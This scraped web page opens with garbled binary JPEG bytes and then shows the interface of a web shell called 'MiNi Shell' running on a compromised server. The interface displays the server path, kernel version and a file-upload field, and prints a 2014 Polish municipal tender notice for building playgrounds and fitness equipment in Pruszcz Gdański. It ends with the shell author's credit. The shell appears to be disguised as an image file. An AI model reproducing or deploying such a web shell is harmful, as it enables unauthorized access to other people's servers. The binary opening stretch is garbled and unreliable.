JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140626/137217-N-2014.html

<p class="kh_header"><b>Pruszcz Gdański: BUDOWA MIEJSC REKREACJI W GMINIE PRUSZCZ GDAŃSKI</b><br>
<b>Numer ogłoszenia: 137217 - 2014; data zamieszczenia: 26.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pruszcz Gdański , ul. Wojska Polskiego 30, 83-000 Pruszcz Gdański, woj. pomorskie, tel. 0-58 692 94 21, 692 94 00, faks 0-58 682 27 14.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pruszczgdanski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA MIEJSC REKREACJI W GMINIE PRUSZCZ GDAŃSKI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest budowa miejsc rekreacji w następujących lokalizacjach Gminy Pruszcz Gdański:
1)	Żukczyn ul. Gdańska dz. nr 28/1; 28/4,
2)	Juszkowo ul. Ogrodowa dz. nr 176; 175/2
3)	Przejazdowo ul. Jesionowa  k/szkoły  dz. nr 83/12; 86/2,
4)	Przejazdowo ul. Długa dz. nr 77/7,
5)	Bystra ul. Ogrodowa dz. nr 66/146,
6)	Bogatka k/świetlicy wiejskiej dz. nr 36/6,
7)	Rokitnica ul. Sadowa dz. nr 6/25,
8)	Borzęcin  ul. Słowicza  dz. 296/1,
9)	Rotmanka ul. Lipowa dz. nr 950/26 
2.	Szczegółowy zakres prac dla poszczególnych lokalizacji obejmuje: 
1)	Żukczyn ul. Gdańska dz. nr 28/1; 28/4,
a)	Dostawa i montaż urządzeń zgodnie z przykładową wizualizacją zawartą w Projekcie zagospodarowania placu zabaw w Żukczynie (załącznik nr 9 do SIWZ) tj.:
- zestawu zabawowego składającego się  z następujących elementów:1 szt. wieży z daszkiem, dwóch zjeżdżalni jednotorowej i  śrubowej, elementów sprawnościowych - poręczy do podciągania się , schodów wejściowych z poręczami, ścianki wspinaczkowej, paneli edukacyjnych kółko-krzyżyk i zegar, wejścia za pomocą ścianki wspinaczkowej, wejścia za pomocą frisbee, elementów wykończeniowych z motywami roślinnymi -  w konstrukcji stalowej ocynkowanej i pokrytej poliestrem na fundamentach betonowych  i elementami z tworzywa o niskiej gęstości polietylenu stabilizowanego UV  - 1 kpl.
 - bujaczka /żaba/ - 1szt,
- kosza na śmieci stalowego o poj. 40l - 2szt, 
- ławek metalowo - drewnianych z oparciem  - 2szt,
- regulaminu placu zabaw  (stalowy stelaż, wypełniony blachą z naklejona treścią regulaminu) - 1szt. 
- stojaka na minimum 8 rowerów -1szt
- urządzeń fitness : 	wyciąg górny+ prasa - 1 kpl.
orbiterek +biegacz bez pylona - 1 kpl. 
b)	Budowa nawierzchni bezpiecznej piaskowej pod  plac zabaw - ułożenie piaskowej nawierzchni na pow. 269,40 m2, gr. 30 cm na  geowłókninie w obrzeżu betonowym 30x8cm 
c)	Budowa nawierzchni z kostki betonowej kolor gr. 6cm na pow. 42m2 w obrzeżu betonowym 30x8cm.
Uwaga! Nie są przedmiotem zamówienia pozostałe elementy zawarte w projekcie zagospodarowania placu zabaw w Żukczynie
2)	 Juszkowo ul. Ogrodowa dz. nr 176; 175/2
a)	Dostawa i montaż urządzeń zgodnie z przykładową wizualizacją zawartą w Projekcie zagospodarowania placu rekreacji z boiskiem w Juszkowie (załącznik nr 10 do SIWZ) tj.:
- zestawu zabawowego składający się  z następujących elementów: 1 szt wieży z daszkiem, dwóch zjeżdżalni jednotorowej i  śrubowej, elementów sprawnościowych - poręczy do podciągania się , schodów wejściowych z poręczami, ścianki wspinaczkowej, paneli edukacyjnych kółko-krzyżyk i zegar, wejścia za pomocą ścianki wspinaczkowej, wejścia za pomocą frisbee, elementów wykończeniowych z motywami roślinnymi -  w konstrukcji stalowej ocynkowanej i pokrytej poliestrem na fundamentach betonowych  i elementami z tworzywa o niskiej gęstości polietylenu stabilizowanego UV -  1 kpl.
- bujaczków 2 szt. -  (konik i żaba)
- huśtawki wagowej na sprężynie -1szt
- ławek metalowo - drewnianych z oparciem  - 4szt,
- koszy na śmieci stalowych o poj. 40l - 2szt,
- regulaminu placu zabaw (stalowy stelaż, wypełniony blachą z naklejona treścią regulaminu) - 1szt. 
- urządzenń fitness : 	wyciąg górny+ prasa - 1 kpl.
orbiterek +biegacz bez pylona - 1 kpl.
ławeczka + prostownik  z  pylonem - 1 kpl.
- przejazdu na linie dł.  20m ze stacjami  - 1 kpl.
b)	Utwardzenie nawierzchni z kostki betonowej kolor gr. 6cm na pow. 63m2 w obrzeżu betonowym 30x8cm.
c)	Budowa nawierzchni bezpiecznej piaskowej pod  plac zabaw i przejazd linowy  - ułożenie piaskowej nawierzchni na pow. 314,00 m2 + 91,20m2 , gr. 30 cm na geowłókninie w obrzeżu betonowym 30x8cm
d)	Dodatkowo Wykonawca zobowiązany będzie do przeniesienia karuzeli, która jest zamontowana na placu w nową lokalizację
Uwaga! Nie są przedmiotem zamówienia pozostałe elementy zawarte w projekcie zagospodarowania placu rekreacji z boiskiem w Juszkowie
3)	Przejazdowo ul. Jesionowa  k/szkoły  dz. nr 83/12; 86/2,
a)	Dostawa i montaż urządzeń zgodnie z przykładową wizualizacją zawartą w Projekcie zagospodarowania placu zabaw w Przejazdowie (załącznik nr 11 do SIWZ) tj.:
- koszy na śmieci stalowy o poj. 40l - 2szt, 
- ławek metalowo - drewnianych bez oparcia  - 3szt,
- stojaków na minimum 8 rowerów -  2szt
b)	Budowa nawierzchni dla urządzeń fitness /urządzenia fitness nie są przedmiotem zamówienia/  na pow. 113.70 m2, z  kostki betonowej kolor gr. 6cm w obrzeżu betonowym 30x8cm  
c)	Budowa nawierzchni dla urządzeń skatepark / urządzenia skatepark nie są przedmiotem zamówienia/  na pow. 220m2  - nawierzchnia betonowa z dodatkiem włókien polipropylenowych i nawierzchnia z kostki betonowej bezfazowej gr.6cm w obrzeżu bet.30x8cm.
Uwaga! Nie są przedmiotem zamówienia pozostałe elementy zawarte w projekcie zagospodarowania placu zabaw w Przejazdowie.
4)	Przejazdowo ul. Długa, dz. nr 77/7
a)	Dostawa i montaż urządzeń zgodnie z przykładową wizualizacją zawartą w załączniku nr 12 do SIWZ tj.:
- zestawu zabawowego składający się  z następujących elementów:  1 szt. wieży z daszkiem, dwóch zjeżdżalni dwutorowej i  śrubowej, elementów sprawnościowych - poręczy do podciągania się , podestu wejściowego,  wejścia za pomocą ścianki wspinaczkowej, walec obrotowy, elementów wykończeniowych z motywami roślinnymi i zwierzęcymi-  w konstrukcji stalowej ocynkowanej i pokrytej poliestrem na fundamentach betonowych  i elementami z tworzywa o niskiej gęstości polietylenu stabilizowanego UV - 1 kpl.
- ścianki wspinaczkowej - dwuelementowa z tworzywa o niskiej gęstości polietylenu stabilizowanego UV - 1 kpl.
- ławek metalowo - drewnianych z oparciem  -1szt,
- koszy na śmieci stalowych o poj. 40l - 1szt,
b)	Budowa nawierzchni bezpiecznej piaskowej pod  urządzenia - ułożenie piaskowej nawierzchni na pow. 102,60 m2, gr. 30 cm na  geowłókninie w obrzeżu betonowym 30x8cm.
5)	Bystra ul. Ogrodowa, dz. nr 66/146 (lokalizacja placu określona została w załączniku nr 13 do SIWZ)
a)	Dostawa i montaż  
- urządzeń fitness tj: 	wyciąg górny+ prasa - 1 kpl.
twister + wahadło - 1 kpl.
- kosza na śmieci stalowego o poj. 40l - 1szt, 
- ławki metalowo - drewnianej bez oparcia  - 1szt,
b)	Budowa nawierzchni dla urządzeń fitness  na pow. 93,10 m2, z  kostki betonowej kolor szary gr. 6cm w obrzeżu betonowym 30x8cm.  
6)	Bogatka k/świetlicy wiejskiej, dz. nr 36/6 (lokalizacja placu określona została w załączniku nr 14 do SIWZ)
a)	Dostawa i montaż  
- urządzeń fitness tj: 	orbiterek + biegacz,  bez pylona - 1 kpl.
twister + wahadło - 1 kpl.
wyciskanie siedząc - 1 szt
- kosza na śmieci stalowego o poj. 40l - 1szt, 
- ławki metalowo - drewnianej bez oparcia  - 1szt,
a)	Budowa nawierzchni dla urządzeń fitness  na pow. 58,89 m2, z  kostki betonowej kolor szary gr. 6cm w obrzeżu betonowym 30x8cm.
7)	Rokitnica ul. Sadowa, dz. nr 6/25
a)	Dostawa i montaż urządzeń zgodnie z przykładową wizualizacją zawartą w załączniku nr 15 do SIWZ tj.:
- zestawu zabawowego składający się  z następujących elementów:  1 szt wieży z daszkiem, dwóch zjeżdżalni dwutorowej i  śrubowej, elementów sprawnościowych - poręczy do podciągania się , podestu wejściowego,  schodów wejściowych z poręczami wejścia za pomocą ścianki wspinaczkowej, wejścia za pomocą frisbee, elementów wykończeniowych z motywami roślinnymi i zwierzęcymi-  w konstrukcji stalowej ocynkowanej i pokrytej poliestrem na fundamentach betonowych  i elementami z tworzywa o niskiej gęstości polietylenu stabilizowanego UV - 1 kpl.
- ścianki wspinaczkowej - trzyelementowa z tworzywa o niskiej gęstości polietylenu stabilizowanego UV - 1 kpl.
- bujaczka (żaba) - 1szt,
- huśtawki wagowej na sprężynie -1szt
- ławek metalowo - drewnianych z oparciem  - 2szt,
- kosza na śmieci stalowego o poj. 40l - 1szt,
Urządzenia należy zamontować do istniejącej nawierzchni asfaltowej - dawne boisko asfaltowe z dystansem 30cm.    
Plac po montażu urządzeń  pokryty zostanie przez Zamawiającego nawierzchnią piaskową gr. 30cm.	
8)	Borzęcin ul. Słowicza, dz. nr 296/1(lokalizacja placu określona została w załączniku nr 16 do SIWZ)
Dostawa i montaż  urządzeń fitness tj: 	 orbiterek - 1 szt
twister + wahadło - 1 kpl.
					masażer pleców i talii - 1 szt
9)	Rotmanka ul. Lipowa, dz. nr 950/26
a)	Dostawa i montaż urządzenia zgodnie z przykładową wizualizacją zawartą w załączniku nr 17 do SIWZ tj.:
 domek z drewna i sklejki wodoodpornej kolorowej z ławeczkami o wym. szer. 2,5m, dł.1,60m, wys. 2m - 1 kpl
b)	Budowa nawierzchni bezpiecznej na pow. 39,20m2 z płyt gumowych systemowych 50x50cm, kolor czerwony w obrzeżu gumowym pod istniejące już urządzenia huśtawkę i karuzelę na placu zabaw dzieci małych,
c)	Budowa nawierzchni bezpiecznej piaskowej pod  urządzenia - ułożenie piaskowej nawierzchni na pow. 75,30 m2, gr. 30 cm na  geowłókninie w obrzeżu betonowym 30x8cm..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.23.32.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 8 000 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę budowlaną, polegającą na budowie placu zabaw o wartości nie mniejszej niż 90 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone tj. osobą, która pełnić będzie funkcję kierownika budowy, posiadającą uprawnienia budowlane w specjalności konstrukcyjno - budowlanej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony druk Formularz oferty, zawierający oświadczenie, że Wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych, a także informację, czy wykonawca należy lub nie należy do grupy kapitałowej, stanowiący załącznik nr 1 do niniejszej specyfikacji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków jej wprowadzenia:
1)	Termin wykonania umowy, określony w § 3 ust. 3 umowy może ulec zmianie z powodu opóźnień wynikających z:
a)	zmian spowodowanych warunkami atmosferycznymi: klęski żywiołowe, warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót, przeprowadzanie prób, sprawdzeń, dokonywanie odbiorów, 
b)	zmian spowodowanych nieprzewidzianymi w siwz warunkami geologicznymi, archeologicznymi lub terenowymi,
c)	zmian będących następstwem okoliczności leżących po stronie Zamawiającego: wstrzymanie robót przez Zamawiającego, , 
d)	zmian będących następstwem działania innych organów np. eksploatatorów infrastruktury,
e)	innych niezależnych od Wykonawcy i Zamawiającego okoliczności, wskutek których niemożliwe będzie ukończenie zamówienia w terminie umownym.
2)	Okoliczności powodujące opóźnienia, o których mowa w pkt. 1 muszą być udokumentowane stosownymi protokołami podpisanymi przez kierownika budowy. Po zatwierdzeniu ich przez Zamawiającego ustala się nowe terminy wykonania umowy, z tym że maksymalny okres przesunięcia terminu wykonania umowy nie może być dłuży niż  okres przerwy lub przestoju.
3)	Zmiana kadry osobowej Wykonawcy wskazanej w ofercie do wykonania zamówienia jest możliwa pod warunkiem zaproponowania innych osób spełniających pierwotne warunki SIWZ. W szczególności konieczności zmian kadry osobowej Wykonawcy wymaga sytuacja gdy Zamawiający uzna, że osoby te nie wykonują należycie swoich obowiązków. Wykonawca Zobowiązany jest dokonać zmiany tych osób w terminie nie dłuższym niż 7 dni od daty złożenia wniosku Zamawiającego. 
4)	Zmiana podmiotu, o którym mowa w art. 26 ust. 2b ustawy Prawo zamówień publicznych jest możliwa pod warunkiem zaproponowania nowego podmiotu, spełniającego pierwotne warunki  określone w SIWZ. 
5)	Wykonawca w trakcie wykonywania umowy może powierzyć wykonanie części robót budowlanych Podwykonawcom, mimo niewskazania w ofercie takiej części do powierzenia Podwykonawcom, wskazać inny zakres Podwykonawstwa niż przedstawiony w ofercie, zrezygnować z Podwykonawstwa, zmienić Podwykonawcę.
6)	Wystąpienia zmian powszechnie obowiązujących przepisów prawa podatkowego w zakresie stawki podatku VAT, co skutkować będzie zmianą wynagrodzenia brutto, przy niezmienionym wynagrodzeniu netto.
7)	Dopuszcza się możliwość wystąpienia robót zamiennych w stosunku do przewidzianych dokumentacją projektową oraz SIWZ w sytuacji, gdy wykonanie tych robót będzie niezbędne do prawidłowego (zgodnego z zasadami wiedzy technicznej i obowiązującego prawa) wykonania przedmiotu umowy i jego dalszej eksploatacji. Zmiana taka nie może spowodować zmiany wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pruszczgdanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pruszcz Gdański ul. Wojska Polskiego 30 - pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2014 godzina 11:00, miejsce: Urząd Gminy Pruszcz Gdański ul. Wojska Polskiego 30 - biuro podawcze (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com